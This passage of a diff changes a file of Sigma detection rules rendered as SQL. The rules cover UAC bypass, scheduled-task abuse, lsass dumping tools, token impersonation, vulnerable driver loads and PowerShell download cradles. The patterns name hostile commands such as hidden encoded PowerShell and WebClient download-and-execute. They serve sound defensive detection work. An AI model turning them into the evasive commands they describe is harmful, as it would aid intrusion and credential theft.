Roth (Nextron Systems), Jonhnathan Ribeiro", + "title": "CMSTP UAC Bypass via COM Object Access", + "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", + "status": "stable", + "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", + "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\') AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_pm_susp_invocation_specific.yml" + "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" }, { - "title": "PowerShell Get Clipboard", - "id": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", + "title": "Suspicious Schtasks From Env Var Folder", + "id": "81325ce1-be01-4250-944f-b4789644556f", "status": "experimental", - "description": "A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1115" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Benign scheduled tasks creations or executions that happen often during software installations", + "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-Clipboard%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" ], - "filename": "posh_pm_get_clipboard.yml" + "filename": "proc_creation_win_schtasks_env_folder.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", - "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", + "title": "Finger.exe Suspicious Invocation", + "id": "af491bca-e752-4b44-9c86-df5680533dbc", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", + "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Admin activity (unclear what they do nowadays with finger.exe)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'finger.exe' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_finger_usage.yml" }, { - "title": "Clear PowerShell History - PowerShell Module", - "id": "f99276ad-d122-4989-a09a-d00904a5f9d2", - "status": "experimental", - "description": "Detects keywords that could indicate clearing PowerShell history", - "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "HackTool - Dumpert Process Dumper Execution", + "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "status": "test", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Very unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\') OR (Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\')) OR ((Payload LIKE '%del%' ESCAPE '\\' OR Payload LIKE '%Remove-Item%' ESCAPE '\\' OR Payload LIKE '%rm%' ESCAPE '\\') AND Payload LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" ], - "filename": "posh_pm_clear_powershell_history.yml" + "filename": "proc_creation_win_hktl_dumpert.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module", - "id": "daf7eb81-35fd-410d-9d7a-657837e602bb", + "title": "Dism Remove Online Package", + "id": "43e32da2-fdd0-4156-90de-50dfd62636f9", "status": "experimental", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", "author": "frack113", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Compress-Archive %' ESCAPE '\\' AND ContextInfo LIKE '% -Path %' ESCAPE '\\' AND ContextInfo LIKE '% -DestinationPath %' ESCAPE '\\' AND ContextInfo LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\DismHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%/Online%' ESCAPE '\\' AND ParentCommandLine LIKE '%/Disable-Feature%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Dism.exe' ESCAPE '\\' AND CommandLine LIKE '%/Online%' ESCAPE '\\' AND CommandLine LIKE '%/Disable-Feature%' ESCAPE '\\')))" ], - "filename": "posh_pm_susp_zip_compress.yml" + "filename": "proc_creation_win_dsim_remove.yml" }, { - "title": "Suspicious Get-ADDBAccount Usage", - "id": "b140afd9-474b-4072-958e-2ebb435abd68", - "status": "test", - "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", - "author": "Florian Roth (Nextron Systems)", + "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet", + "id": "435e10e4-992a-4281-96f3-38b11106adde", + "status": "experimental", + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADComputer %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" ], - "filename": "posh_pm_get_addbaccount.yml" + "filename": "proc_creation_win_powershell_computer_discovery_get_adcomputer.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", - "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "title": "Root Certificate Installed From Susp Locations", + "id": "5f6a601c-2ecb-498b-9c33-660362323afa", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1553.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" }, { - "title": "Process Hacker and System Informer Driver Load", - "id": "67add051-9ee7-4ad3-93ba-42935615ae8d", + "title": "HackTool - Impersonate Execution", + "id": "cf0c254b-22f1-4b2b-8221-e137b3c0af94", "status": "experimental", - "description": "Detects the load of drivers used by Process Hacker and System Informer", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "author": "Sai Prashanth Pulisetti @pulisettis", "tags": [ "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" ], "falsepositives": [ - "Legitimate user of process hacker or system informer by low level developers or system administrators" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemInformer.sys' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=821D74031D3F625BCBD0DF08B70F1E77%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F86759BB4DE4320918615DC06E998A39%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A64EEB85419257D0CE32BD5D55C3A18%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6E7B34DFC017700B1517B230DF6FF0D0%' ESCAPE '\\') OR Imphash IN ('821D74031D3F625BCBD0DF08B70F1E77', 'F86759BB4DE4320918615DC06E998A39', '0A64EEB85419257D0CE32BD5D55C3A18', '6E7B34DFC017700B1517B230DF6FF0D0') OR (Hashes LIKE '%SHA256=8B9AD98944AC9886EA4CB07700E71B78BE4A2740934BB7E46CA3B56A7C59AD24%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A41348BEC147CA4D9EA2869817527EB5CEA2E20202AF599D2B30625433BCF454%' ESCAPE '\\' OR Hashes LIKE '%SHA256=38EE0A88AF8535A11EFE8D8DA9C6812AA07067B75A64D99705A742589BDD846D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A773891ACF203A7EB0C0D30942FB1347648F1CD918AE2BFD9A4857B4DCF5081B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4C3B81AC88A987BBDF7D41FA0AECC2CEDF5B9BD2F45E7A21F376D05345FC211D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3241BC14BEC51CE6A691B9A3562E5C1D52E9D057D27A3D67FD0B245C350B6D34%' ESCAPE '\\' OR Hashes LIKE '%SHA256=047C42E9BBA28366868847C7DAFC1E043FB038C796422D37220493517D68EE89%' ESCAPE '\\' OR Hashes LIKE '%SHA256=18931DC81E95D0020466FA091E16869DBE824E543A4C2C8FE644FA71A0F44FEB%' ESCAPE '\\' OR Hashes LIKE '%SHA256=B4C2EF76C204273132FDE38F0DED641C2C5EE767652E64E4C4071A4A973B6C1B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=640954AFC268565F7DAA6E6F81A8EE05311E33E34332B501A3C3FE5B22ADEA97%' ESCAPE '\\' OR Hashes LIKE '%SHA256=251BE949F662C838718F8AA0A5F8211FB90346D02BD63FF91E6B224E0E01B656%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E2606F272F7BA054DF16BE464FDA57211EF0D14A0D959F9C8DCB0575DF1186E4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3A9E1D17BEEB514F1B9B3BACAEE7420285DE5CBDCE89C5319A992C6CBD1DE138%' ESCAPE '\\') OR sha256 IN ('8b9ad98944ac9886ea4cb07700e71b78be4a2740934bb7e46ca3b56a7c59ad24', 'a41348bec147ca4d9ea2869817527eb5cea2e20202af599d2b30625433bcf454', '38ee0a88af8535a11efe8d8da9c6812aa07067b75a64d99705a742589bdd846d', 'a773891acf203a7eb0c0d30942fb1347648f1cd918ae2bfd9a4857b4dcf5081b', '4c3b81ac88a987bbdf7d41fa0aecc2cedf5b9bd2f45e7a21f376d05345fc211d', '3241bc14bec51ce6a691b9a3562e5c1d52e9d057d27a3d67fd0b245c350b6d34', '047c42e9bba28366868847c7dafc1e043fb038c796422d37220493517d68ee89', '18931dc81e95d0020466fa091e16869dbe824e543a4c2c8fe644fa71a0f44feb', 'b4c2ef76c204273132fde38f0ded641c2c5ee767652e64e4c4071a4a973b6c1b', '640954afc268565f7daa6e6f81a8ee05311e33e34332b501a3c3fe5b22adea97', '251be949f662c838718f8aa0a5f8211fb90346d02bd63ff91e6b224e0e01b656', 'e2606f272f7ba054df16be464fda57211ef0d14a0d959f9c8dcb0575df1186e4', '3a9e1d17beeb514f1b9b3bacaee7420285de5cbdce89c5319a992c6cbd1de138'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%impersonate.exe%' ESCAPE '\\' AND (CommandLine LIKE '% list %' ESCAPE '\\' OR CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% adduser %' ESCAPE '\\')) OR ((Hashes LIKE '%MD5=9520714AB576B0ED01D1513691377D01%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A358FFC1697B7A07D0E817AC740DF62%' ESCAPE '\\') OR md5 = '9520714AB576B0ED01D1513691377D01' OR sha256 = 'E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A' OR Imphash = '0A358FFC1697B7A07D0E817AC740DF62')))" ], - "filename": "driver_load_win_process_hacker.yml" + "filename": "proc_creation_win_hktl_impersonate.yml" }, { - "title": "Vulnerable Lenovo Driver Load", - "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", - "status": "experimental", - "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "title": "Ps.exe Renamed SysInternals Tool", + "id": "18da1007-3f26-470f-875d-f77faf1cab31", + "status": "test", + "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" + "attack.defense_evasion", + "attack.g0035", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Legitimate driver loads (old driver that didn't receive an update)" + "Renamed SysInternals tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine = 'ps.exe -accepteula')" ], - "filename": "driver_load_win_vuln_lenovo_driver.yml" + "filename": "proc_creation_win_apt_ta17_293a_ps.yml" }, { - "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", - "id": "295c9289-acee-4503-a571-8eacaef36b28", + "title": "Schtasks From Suspicious Folders", + "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", "status": "experimental", - "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects scheduled task creations that have suspicious action command and folder combinations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_hevd_driver.yml" + "filename": "proc_creation_win_schtasks_folder_combos.yml" }, { - "title": "PowerShell Scripts Run by a Services", - "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", + "title": "Potential BearLPE Exploitation", + "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", + "author": "Olaf Hartong", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.privilege_escalation", + "attack.t1053.005", + "car.2013-08-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" ], - "filename": "driver_load_win_powershell_script_installed_as_service.yml" + "filename": "proc_creation_win_exploit_other_bearlpe.yml" }, { - "title": "Vulnerable Driver Load By Name", - "id": "c316eac1-f3d8-42da-ad1c-66dcec5ca787", - "status": "experimental", - "description": "Detects the load of known vulnerable drivers via their names only.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1068" - ], + "title": "Suspicious Hacktool Execution - Imphash", + "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", + "status": "experimental", + "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", - "If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)" + "Legitimate use of one of these tools" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ADV64DRV.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Agent64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ALSysIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amifldrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsIO.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asmmap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrAutoChkUpdDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv101.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrIbDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrOmgDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrRapidStartDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrSmartConnectDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsUpIO.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atillk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_Def64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CITMDRV\\_AMD64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CITMDRV\\_IA64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz141.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutil\\_2\\_3.sys' ESCAPE '\\' OR ImageLoaded LIKE 